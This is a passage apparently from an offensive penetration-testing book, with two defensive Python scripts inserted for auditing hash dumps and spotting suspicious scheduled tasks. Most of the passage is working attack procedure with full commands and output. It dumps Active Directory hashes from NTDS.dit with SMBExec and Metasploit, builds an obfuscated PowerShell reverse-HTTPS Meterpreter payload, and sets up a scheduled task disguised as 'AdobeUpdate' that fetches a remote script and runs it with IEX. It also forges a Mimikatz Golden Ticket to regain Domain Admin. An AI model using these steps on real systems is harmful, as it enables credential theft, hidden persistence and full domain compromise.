[+] Volume Shadow Copy Successfully Created...
[*] Attempting to copy the ntds.dit file from the Volume Shadow Copy...
[*] Extracting data and link tables from the ntds.dit file...
esedbexport 20120102

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.


SMBExec - Volume Shadow Copy


NTDS.dit download complete
We have ntds.dit & sys files...let's get some hashes
Attempting to remove the files created from the Domain Controller...
Attempting to remove the shadow copy created from the Domain Controller.


We just saw that SMBExec connected to the Domain Controller with valid credentials, validated the 
paths, and created a Shadow Copy from which it copied the ntds.dit and SYSTEM files. Once this was 
completed, SMBExec parsed those files and collected and stored all the password hashes from LDAP. 


Once SMBExec finishes successfully, it creates a folder in the same directory named after a date-time 
stamp. If you go into this folder you will see a file called [domain]-dc-hashes.lst. 


root@kali:/opt/smbexec# ls
2013-12-11-2300-smbexec  install.sh  patches  progs  README  smbexec.sh
root@kali:/opt/smbexec# cd 2013-12-11-2300-smbexec/
root@kali:/opt/smbexec/2013-12-11-2300-smbexec# ls
hashes
root@kali:/opt/smbexec/2013-12-11-2300-smbexec# cd hashes/
root@kali:/opt/smbexec/2013-12-11-2300-smbexec/hashes# ls
DC
root@kali:/opt/smbexec/2013-12-11-2300-smbexec/hashes# cd DC/
root@kali:/opt/smbexec/2013-12-11-2300-smbexec/hashes/DC# ls
corp.fakedomain.testlab-dc-hashes.lst  cred.lst  ntds.dit  ntds.output  sys
root@kali:/opt/smbexec/2013-12-11-2300-smbexec/hashes/DC# vi corp.fakedomain.testlab-dc-hashes.lst

SMBExec Results 


Inside the example compromised domain controller, I am able to find the NTLM hashes for the 
following users: 


Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b9e471f83d355eda6bf63524b044870:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
adminaccount:1000:aad3b435b51404eeaad3b435b51404ee:954bf28f34e47904f5c8725650f27283:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:876c4efd01dbf8da6cd04c60ddac0f95:::
bobsmith:1105:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589:::
domainadmin:1106:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589:::
pmartian:1107:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589:::


Remember that if you are querying a large domain controller, go grab a coffee, as this will take a 
considerable amount of time. After you collect all these hashes, you can start password cracking or 
utilize the passing of hashes to continually exploit boxes. 


PSExec NTDSgrab 

(http://www.rapid7.com/db/modules/auxiliary/admin/smb/psexec_ntdsgrab) (Kali Linux): 


Another great way to dump hashes is with a Metasploit module called psexec_ntdsgrab. Similar to 
SMBExec, PSExec NTDSGrab “authenticates to an Active Directory Domain Controller and creates 
a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the ntds.dit file as 
well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM hive copy can be used in 
combination with other tools for offline extraction of AD password hashes. All of this is done without 
uploading a single binary to the target host.” {23} 





With local/domain administrator credentials, let’s grab the domain hashes: 

• msfconsole 

• use auxiliary/admin/smb/psexec_ntdsgrab 

• Make sure to SET the fields for RHOST, SMBDomain, SMBPass, and SMBUser 

• exploit 


msf auxiliary(psexec_ntdsgrab) > show options

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CREATE_NEW_VSC        false            no        If true, attempts to create a volume shadow copy
   RHOST                 172.16.151.200   yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             hacker.testlab   no        The Windows domain to use for authentication
   SMBPass               !Asdfasdfasdf!   no        The password for the specified username
   SMBSHARE              C$               yes       The name of a writeable share on the server
   SMBUser               lab              no        The username to authenticate as
   VSCPATH                                no        The path to the target Volume Shadow Copy
   WINPATH               WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf auxiliary(psexec_ntdsgrab) > exploit

[*] 172.16.151.200:445 - Checking if a Volume Shadow Copy exists already...
[*] 172.16.151.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.151.200:445 - No VSC Found.
[*] 172.16.151.200:445 - Creating Volume Shadow Copy
[*] 172.16.151.200:445 - Downloading ntds.dit
[*] 172.16.151.200:445 - ntds.dit stored at /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.bin
[*] 172.16.151.200:445 - Downloading SYSTEM hive file
[*] 172.16.151.200:445 - SYSTEM hive stored at /root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin
[*] 172.16.151.200:445 - Executing cleanup...
[*] 172.16.151.200:445 - Cleanup was successful
[*] Auxiliary module execution completed
msf auxiliary(psexec_ntdsgrab) >


Using psexec_ntdsgrab 


If grabbing the NTDS.dit file was successful, Metasploit will drop the file into the /root/.msf4/loot/ 
folder. Next, we need to convert the dit file to hashes with esedbtools and NTDSXtract. 


esedbexport command: 

• How to run: esedbexport -t [Location of Export] [NTDS.dit file] 

• /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit 






root@kali:/opt# /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit
esedbexport 20120102

Opening file.
Exporting table 1 (MSysObjects) out of 14.
Exporting table 2 (MSysObjectsShadow) out of 14.
Exporting table 3 (MSysObjids) out of 14.
Exporting table 4 (MSysLocales) out of 14.
Exporting table 5 (datatable) out of 14.
Exporting table 6 (hiddentable) out of 14.
Exporting table 7 (link_history_table) out of 14.
Exporting table 8 (link_table) out of 14.
Exporting table 9 (sdpropcounttable) out of 14.
Exporting table 10 (sdproptable) out of 14.
Exporting table 11 (sd_table) out of 14.
Exporting table 12 (MSysDefrag2) out of 14.
Exporting table 13 (quota_table) out of 14.
Exporting table 14 (quota_rebuild_progress_table) out of 14.
Export completed.


Converting NTDS.dit 


Next we need to run dshashes.py to convert our tables to password hashes. How to run: 

• dshashes.py [datatable table] [link table] [work directory] --passwordhashes [original bin file from 
ntdsgrab] 

• python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 /tmp/ntds.export/link_table.7 /tmp/ --passwordhashes /root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin 


root@kali:/opt# python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 /tmp/ntds.export/link_table.7 /tmp/ --passwordhashes /root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin
Running with options:
Extracting password hashes
Initialising engine...
Scanning database - 100% -> 3824 records processed
Extracting schema information - 100% -> 1738 records processed.
Extracting object links...

List
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
lab:1001:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:04f3c2fa60ed9f8f30803df6837ebed3:::
testuser1:1106:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
testuser2:1107:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
limited_user:1110:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
limiteduser:1111:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
root@kali:/opt#


Extracting Hashes 


This is just another way to dump domain hashes. In various tests, I have had either SMBExec or 
psexec_ntdsgrab not work for some odd reason. In other words, there were times when one tool 
worked while the other did not. Therefore, make sure you have both of these tools in your back 
pocket. 
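The same pwdump-format output is what a defender reviewing their own domain's hashes would audit, and the dumps above already show the three things worth flagging: the empty-password NT hash (Guest), an LM hash still stored for an account, and several accounts sharing one NT hash, which means one shared password. The Python below is an added example, not code from the book, SMBExec or NTDSXtract; the sample dump is constructed from the shape of the listings above plus the well-known hash of the password "password" for a made-up "legacy" account.

```python
"""Audit a pwdump-format hash dump (user:RID:LM:NT:::) for weak-credential
indicators. Added example; not code from the book, SMBExec or NTDSXtract."""
from collections import defaultdict

# Well-known hashes of the empty password. An LM field equal to EMPTY_LM means
# no LM hash is stored, which is the expected state on a modern domain.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEXDIGITS = set("0123456789abcdef")

# Constructed sample in the format SMBExec and dshashes.py emit. The first six
# lines mirror the book's listing; "legacy" carries the LM/NT hashes of the
# password "password"; the comment line is there to exercise error handling.
SAMPLE_DUMP = """\
# dumped 2015-02-14 from DC
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b9e471f83d355eda6bf63524b044870:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:876c4efd01dbf8da6cd04c60ddac0f95:::
bobsmith:1105:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589:::
domainadmin:1106:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589:::
pmartian:1107:aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589:::
legacy:1108:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_dump(text):
    """Return (records, skipped): one dict per well-formed line, and the count
    of lines that were not user:RID:LM:NT records."""
    records, skipped = [], 0
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            skipped += 1
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32 or not (set(lm) | set(nt)) <= HEXDIGITS:
            skipped += 1
            continue
        records.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return records, skipped


def audit(records):
    """Group findings a reviewer acts on: empty passwords, LM hashes that are
    still stored, and NT hashes shared by more than one account."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        "empty_password": [r["user"] for r in records if r["nt"] == EMPTY_NT],
        "lm_hash_stored": [r["user"] for r in records if r["lm"] != EMPTY_LM],
        # Accounts sharing a hash share a password; the empty hash is already
        # reported above, so it is excluded here.
        "reused_nt": {h: users for h, users in by_nt.items()
                      if len(users) > 1 and h != EMPTY_NT},
    }


if __name__ == "__main__":
    recs, bad = parse_dump(SAMPLE_DUMP)
    print(f"{len(recs)} accounts parsed, {bad} line(s) skipped")
    for key, value in audit(recs).items():
        print(f"{key}: {value}")
```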




Persistence 


One thing that I skipped in the last book is different ways to create persistence. I have found that there 
are tons of different ways to accomplish this (even the cheap method of dropping the binary in 
startup), but here are a few of my tricks. 


Veil And Powershell 


Veil has been great for evading AV, but it can also create PowerShell Meterpreter executables. I 
really prefer having PowerShell files over actual binaries, just because you never know what AV 
might pick up on. Let's use Veil to create a quick payload. 

• cd /opt/Veil-Evasion/ 

• ./Veil-Evasion 


First, list all of the available payloads with the list command: 


Available commands:

  use        use a specific payload
  info       information on a specific payload
  list       list available payloads
  update     update Veil to the latest version
  clean      clean out payload folders
  checkvt    check payload hashes vs. VirusTotal
  exit       exit Veil


[>] Please enter a command: list

Since we want to use Meterpreter Reverse HTTPS, we can pick the following: 
17) powershell/meterpreter/rev_https 


We need to define all the parameters so that the Meterpreter session can connect back to our host. Set 
the following information: 


  Name     Current Value   Description
  LHOST                    IP of the metasploit handler
  LPORT    8443            Port of the metasploit handler
  PROXY    N               Use system proxy settings


For example, my Kali Linux host is 172.16.151.140. To set the Local Host: 






[>] set LHOST 172.16.151.140
[>] Please enter a command: generate

[>] Please enter the base name for output files: reverse_https


And your output might look something like the following: 


Veil-Evasion | [Version]: 2.15.3
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

[*] Press [enter] for 'payload'

[>] Please enter the base name for output files: reverse_https
Language: powershell
Payload: powershell/meterpreter/rev_https
Required Options: LHOST=172.16.151.140 LPORT=8443 PROXY=N
Payload File: /root/veil-output/source/reverse_https.bat
Handler File: /root/veil-output/handlers/reverse_https_handler.rc

[*] Your payload files have been generated, don't get caught!

[>] press any key to return to the main menu:


Veil-Framework 


Take a look at the two files created. The reverse_https.bat file will contain something like the 
following: 


root@kali:/opt/Veil-Evasion# cat /root/veil-output/source/reverse_https.bat

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"[base64 blob omitted]\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"[base64 blob omitted]\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")

PowerShell Encoded Meterpreter 


This is a bat file carrying a compressed PowerShell payload. It detects the processor architecture and 
runs the matching PowerShell payload, which connects back to your listener. 

The second file is a resource file, as we have seen before, that will automatically set up our handler 
to accept the PowerShell payloads. Kick off the resource file with “msfconsole -r /root/veil-
output/handlers/reverse_https_handler.rc”. 


[*] Processing /root/veil-output/handlers/reverse_https_handler.rc for ERB directives.
resource (/root/veil-output/handlers/reverse_https_handler.rc)> use exploit/multi/handler
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set PAYLOAD windows/meterpreter/reverse_https
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set LHOST 172.16.151.140
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set LPORT 8443
resource (/root/veil-output/handlers/reverse_https_handler.rc)> set ExitOnSession false
resource (/root/veil-output/handlers/reverse_https_handler.rc)> exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
msf exploit(handler) >


Now you can do a few things here. You can drop that bat file into the startup folder, configure a 
scheduled task to run that PowerShell script, or execute the PowerShell from a command line. 


To run it from a command shell, you need to remove the backslashes (two of them), change the inside 
quotes to ticks, and remove the ending parenthesis. For example, from the reverse_https.bat, we 
stripped out just what we need to execute the Meterpreter (and cleaned up the backslashes, inside 
quotes, and end parenthesis). The benefit of this is that you don't need to download any PowerShell 
script. The whole payload is compressed into the command below (for 64-bit systems): 


%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream ($([Convert]::FromBase64String('nVRtb9pIEP70rxhZe5KtYMe8NE2wIpWSpsldoTSk...pKRtsdc5C')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" 


We can also drop the reverse_https.bat onto the host, put it in the startup folder, and on a successful 
reboot get a full Meterpreter session back to our host: 


msf exploit(handler) > 

[*] 172.16.151.202:49850 Request received for 73gZh... 

[*] 172.16.151.202:49850 Staging connection for target 73gZh received... 

[*] Meterpreter session 2 opened (172.16.151.140:8443 -> 172.16.151.202:49850) at 2015-01-13 
03:02:18-0500 


Persistence With Schedule Tasks 


We are going to reuse the PowerSploit Invoke-Shellcode script to keep persistence on the host system. 
Because we have limited space in the schtasks command and we may want our reverse_https 
Meterpreter sessions to change destination hosts, we are going to modify the Invoke-Shellcode 
PowerShell script and repost it. Once re-posted, we will configure a schtask to run once a day and 
connect back to our Meterpreter handler. {24} 


First we need to grab a copy of Invoke-Shellcode and modify it. We will use our Kali host machine to 
modify the Invoke-Shellcode script. 

• cd /opt/PowerSploit/CodeExecution 


As we said before, we are limited in space, so we are going to copy the original file to a file with a 
shorter name: 

• cp Invoke-Shellcode.ps1 1.ps1 


Next, let's edit the 1.ps1 script and add our reverse shell information at the bottom of the file. To 
do this, add the following line, filling in the listener IP and port: 

• Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 
[LISTENER IP] -Lport [LISTENER PORT] -Force; 


For example, my Metasploit handler is on 192.168.199.128 and listening on port 8443. I add this as 
the last line: 

• Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 
192.168.199.128 -Lport 8443 -Force; 



1.ps1 (/opt/PowerSploit/CodeExecution) - VIM

[... unchanged tail of Invoke-Shellcode.ps1: the Inject-RemoteShellcode and Inject-LocalShellcode branches ...]

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.199.128 -Lport 8443 -Force;


Modifying Invoke-Shellcode 


We now have our shortened Invoke-Shellcode script and can move this file off to a web server. In this 
example, we can just move it to /var/www and start the Apache web server: 

• cp 1.ps1 /var/www/ 

• service apache2 start 


Validate this by going to http://[Your IP]/1.ps1 


Generally, I would host this file on a URL-shortening site, but for this example we are just hosting it 
locally. Everything is set up to add persistence to our victim host. All we need is a shell and the 
following command: 


• schtasks /create /tn AdobeUpdate /tr 
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoLogo 
-WindowStyle hidden -NonInteractive -ep bypass -nop -c 'IEX ((new-object 
net.webclient).downloadstring(\"http://[Your IP]/1.ps1\"))'" /SC DAILY /ST 12:00:00 

This creates a schtask named AdobeUpdate that runs at noon every day to download your modified 
PowerShell script and execute it. Two additional options are: 

• If you have system privileges, you can run the script under SYSTEM. Just add the 
following switch to the above command: 

o /ru System 

• If you are attacking a 32-bit Windows system, change the PowerShell location in 
your schtask to: 

o c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe 
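From the defender's side, a task like AdobeUpdate stands out in the output of schtasks /query /fo CSV /v: the action launches PowerShell with a hidden window, an execution-policy bypass, no profile, a download and an IEX, often from the 32-bit PowerShell under syswow64 and as SYSTEM. The Python below is an added example, not code from the book; it reads that CSV and scores each task on those indicators. The CSV rows are constructed, trimmed to the columns the check uses, and 192.0.2.10 stands in for the download host.

```python
"""Flag scheduled tasks whose action launches PowerShell the way a
download-and-execute persistence task does. Added example, not the book's
code; input is the CSV produced by `schtasks /query /fo CSV /v`."""
import csv
import io
import re

# Constructed sample: three tasks in the verbose CSV layout, reduced to the
# columns this check uses (real output carries many more). The first row is
# the book's AdobeUpdate task with a documentation address as the host.
SAMPLE_CSV = r'''"TaskName","Task To Run","Run As User","Schedule Type"
"\AdobeUpdate","c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(""http://192.0.2.10/1.ps1""))'","SYSTEM","Daily"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g -$","SYSTEM","Weekly"
"\Backup","powershell.exe -File C:\Scripts\backup.ps1","CORP\svc_backup","Daily"
'''

# Each indicator is a name and a pattern matched against the lower-cased
# command line. None is conclusive alone; the combination is what matters.
INDICATORS = [
    ("execution_policy_bypass", re.compile(r"-(ep|exec|executionpolicy)\s+bypass")),
    ("hidden_window", re.compile(r"-(w|windowstyle)\s+hidden")),
    ("no_profile", re.compile(r"-nop\b|-noprofile")),
    ("encoded_command", re.compile(r"-(e|ec|enc|encodedcommand)\s")),
    ("remote_download", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression")),
    # 32-bit PowerShell on a 64-bit host, as the book's task uses.
    ("wow64_powershell", re.compile(r"\\syswow64\\")),
]
POWERSHELL = re.compile(r"powershell(\.exe)?\b")
SYSTEM_ACCOUNTS = {"system", "nt authority\\system"}


def classify_task(task):
    """Return the indicator names that fire for one task row (a dict with the
    'Task To Run' and 'Run As User' columns). Non-PowerShell tasks and plain
    PowerShell invocations return an empty list."""
    cmd = task["Task To Run"].lower()
    if not POWERSHELL.search(cmd):
        return []
    hits = [name for name, pattern in INDICATORS if pattern.search(cmd)]
    # Running as SYSTEM only adds weight once something else looks off.
    if hits and task["Run As User"].strip().lower() in SYSTEM_ACCOUNTS:
        hits.append("system_account")
    return hits


def audit_tasks(csv_text):
    """Map each suspicious TaskName to its list of indicators."""
    findings = {}
    for task in csv.DictReader(io.StringIO(csv_text)):
        hits = classify_task(task)
        if hits:
            findings[task["TaskName"]] = hits
    return findings


if __name__ == "__main__":
    for name, hits in audit_tasks(SAMPLE_CSV).items():
        print(f"{name}: {len(hits)} indicator(s): {', '.join(hits)}")
```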


Golden Ticket 


Kerberos is something extremely important to understand. Since explaining exactly how Kerberos and 
Kerberos tickets work is pretty complicated, I will direct you to a SANS blog article that covers this 
topic well. 


Full Link: 
http://digital-forensics.sans.org/blog/2014/11/24/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-more 


Bit.ly Link: 
http://bit.ly/1DKOkaS 


In short, Kerberos is an authentication and authorization platform that uses tickets. What if you 
could create your own tickets to authenticate to any server? That is exactly what the Golden Ticket 
does. On the topic of persistence, let's say you compromised a Domain Controller in the past and 
dumped all the hashes. Your client tells you a week later that they fixed all the vulnerabilities you 
identified to get Domain Admin and changed all the passwords. They hire you again to see what you 
can do. You do the normal social engineering to get your initial shell, but now you are only a limited 
user. All the initial entry points are now blocked and they have limited scanning detection/prevention. 

With the Golden Ticket, you don't have to worry about any of that. You can take the old krbtgt hash 
from the previous hash dump and promote yourself back to Domain Admin. Best of all, you can do 
all this from an unprivileged account. A few things you need to know about the krbtgt account: 

• Resetting its system-generated password is not recommended, because it could break the 
whole domain. Therefore, it is generally never changed. (Although Microsoft recently 
released a tool to handle resetting the krbtgt account.) 

• Even if every Domain Admin password is changed, you can still become a DA. 

• The only time I have seen the system-generated password changed is during a domain 
functional level upgrade from 2003 to 2008. 

• With the Golden Ticket you can create tickets for users and groups that don't exist. 


So what do you need to perform the Golden Ticket attack? {25} {26} {27} 

• 1) Domain 

o On a victim host type: whoami 

• 2) Domain Admin User 

o On a victim host type: net localgroup administrators /DOMAIN 

• 3) Domain SID 

o On a victim host type: whoami /user 
o Chop off the last dash and four digits 

• 4) krbtgt 

o From a previous hashdump, you just need the second half of the hash 
(just the NTLM hash) 


msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell
Process 1708 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\testuser1\Desktop>whoami
whoami
hacker\testuser1

C:\Users\testuser1\Desktop>net localgroup administrators /DOMAIN
net localgroup administrators /DOMAIN
The request will be processed at a domain controller for domain hacker.testlab.

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
lab
Local Admin
The command completed successfully.

C:\Users\testuser1\Desktop>whoami /user
whoami /user

USER INFORMATION
----------------

User Name         SID
================= ==============================================
hacker\testuser1  S-1-5-21-3525058729-1821581466-2040179600-1106


Information Needed to Create Golden Ticket 


As seen in prior examples, to get the krbtgt hash we first had to dump all the domain hashes. This can 
be accomplished using SMBExec with a Domain Admin account. Running SMBExec, I chose Hash 
Dump and dumped the Domain Controller. 






****************************************
*             smbexec 2.3              *
****************************************

Hash Dump Menu

1. Domain Controller
2. Workstation & Server Hashes
3. Main menu

172.16.151.200
hacker.testlab\lab
Pass: !Asdfasdfasdf!

Choice : 1

Gather hashes from the Domain Controller's NTDS.dit file

Target IP, host list, or Nmap XML file [172.16.151.200] :
Username [lab] :
Password or hash [Pass: !Asdfasdfasdf!] :
Domain [hacker.testlab] :
Enter the Drive to save the Shadow Copy and SYS key [C:] :
Enter the Path to save the Shadow Copy and SYS key [\Windows\TEMP] :
Enter the Drive where the NTDS.dit file is [C:] :
Enter the Path to the NTDS.dit file [\Windows\NTDS] :

[*] Checking if space exists to copy files...
[*] Creating shadow copy...
[*] NTDS.dit percent copied: Complete
[*] ntds.dit copied to ./log/smbexec-2015-1-5/hashes/172.16.151.200/ntds.dit
[*] sys copied to ./log/smbexec-2015-1-5/hashes/172.16.151.200/sys
[*] Deleting shadow copy id [<shadow copy GUID>]...
[*] Deleting copied files from C:\Windows\TEMP...
[*] Exporting NTDS file contents, this might take a while...


Recovering Hashes from the Domain Controller 


Once completed, a log file will be created with the Domain Hashes. The hash that you will need is 
the second part of the krbtgt hash. 


[Screenshot: 172.16.151.200-DC_dump.txt opened from /opt/smbexec/log/ on the Kali host]



krbtgt’s Hashes 


Now we have everything we need to create the Golden Ticket. Go back to our original shell: 

• First drop into Mimikatz 2.0 

o use kiwi 

• Create the Golden Ticket 

o golden_ticket_create -u <Domain Admin Username> -d <Domain> -k <krbtgt hash> -s <Domain SID> -t <Location to Drop Golden Ticket> 


meterpreter > use kiwi
Loading extension kiwi...

  .#####.   mimikatz 2.0 alpha (x86/win32) release "Kiwi en C"
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

[!] Loaded x86 Kiwi on an x64 architecture.
success.

meterpreter > golden_ticket_create -u lab -d hacker -k 04f3c2fa60ed9f8f30803df6837ebed3 -s S-1-5-21-3525058729-1821581466-2040179600 -t /opt/ticket.txt
[+] Golden Kerberos ticket written to /opt/ticket.txt


Creating the Golden Ticket 


That's it. We now have a Golden Kerberos Ticket. As we said in our scenario before, your client 
SUCK has asked you to come back for a remediation test. You verify that they fixed all the holes from 
last time and that passwords were reset, but remember, you have the Golden Ticket. 

You use a little spearphishing to get your initial foothold in the company with an unprivileged shell. 
You test your access by trying to see if you can read any files on the Domain Controller, but you don't 
have access. You take a look at your Kerberos tickets and see that you are a limited user. 


Using the Golden Ticket 

• Shell access with limited privileges (does not have to be Local Administrator) 

o sessions -i [id] 

• Load Mimikatz 2.0 

o use kiwi 

• Check current Kerberos tickets 

o kerberos_ticket_list 

• Purge all Kerberos tickets 

o kerberos_ticket_purge 

• Load our Golden Ticket (stored in /opt/ticket.txt on our Kali VM) 

o kerberos_ticket_use /opt/ticket.txt 

• Drop into a shell and read files off the DC 

o shell 
o dir \\DC\c$ 

Below, we check which Kerberos tickets are currently loaded. From the listing, all the tickets are 
currently owned by testuser1 (the limited account). 



msf exploit(handler) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > use kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.0 alpha (x86/win32) release "Kiwi en C"
  [...]
[!] Loaded x86 Kiwi on an x64 architecture.
success.

meterpreter > kerberos_ticket_
kerberos_ticket_list   kerberos_ticket_purge   kerberos_ticket_use

meterpreter > kerberos_ticket_list
Kerberos Tickets

Server                                                  Client                       Start                     Flags
LDAP/DC.hacker.testlab/hacker.testlab @ HACKER.TESTLAB  testuser1 @ HACKER.TESTLAB   2015-01-08 05:22:30.000   (NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE)
cifs/dc.hacker.testlab @ HACKER.TESTLAB                 testuser1 @ HACKER.TESTLAB   2015-01-08 05:22:23.000   (NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE)
krbtgt/HACKER.TESTLAB @ HACKER.TESTLAB                  testuser1 @ HACKER.TESTLAB   2015-01-08 05:22:23.000   (NAME_CANONICALIZE, PRE_AUTHENT, RENEWABLE, FORWARDED, FORWARDABLE)
krbtgt/HACKER.TESTLAB @ HACKER.TESTLAB                  testuser1 @ HACKER.TESTLAB   2015-01-06 02:11:29.000   (NAME_CANONICALIZE, PRE_AUTHENT, INITIAL, RENEWABLE, FORWARDABLE)
ldap/dc.hacker.testlab @ HACKER.TESTLAB                 testuser1 @ HACKER.TESTLAB   2015-01-07 06:42:43.000   (NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE)

Total Tickets : 5


Current Kerberos Tickets 


We can verify this by dropping into a shell: 


meterpreter > shell 
Process 1524 created. 
Channel 1 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Users\testuser1\Desktop>dir \\dc\c$ 
dir \\dc\c$ 
Access is denied. 


Without Domain Administrative privileges, we can’t log into the Domain Controller. We first need to 
purge all of our current Kerberos tickets. Once purged, we use our Golden Ticket to load a “lab” user 
ticket. From the work prior, we found that the lab account was a member of the Domain Admins group. 


Once we list our tickets again, we see below that we now have a “lab” ticket in our ticket list. 


meterpreter > kerberos_ticket_purge 
[+] Kerberos tickets purged 
meterpreter > kerberos_ticket_use /opt/ticket.txt 
[*] Using Kerberos ticket stored in /opt/ticket.txt, 1033 bytes 
[+] Kerberos ticket applied successfully 
meterpreter > kerberos_ticket_list 
Kerberos Tickets 
Server  Client  Start  End  Flags 
krbtgt/hacker @ hacker  lab @ hacker  2015-01-07 08:37:54.000  2025-01-07 08:37:54.000  (... FORWARDABLE) 
Total Tickets : 1 
meterpreter > 

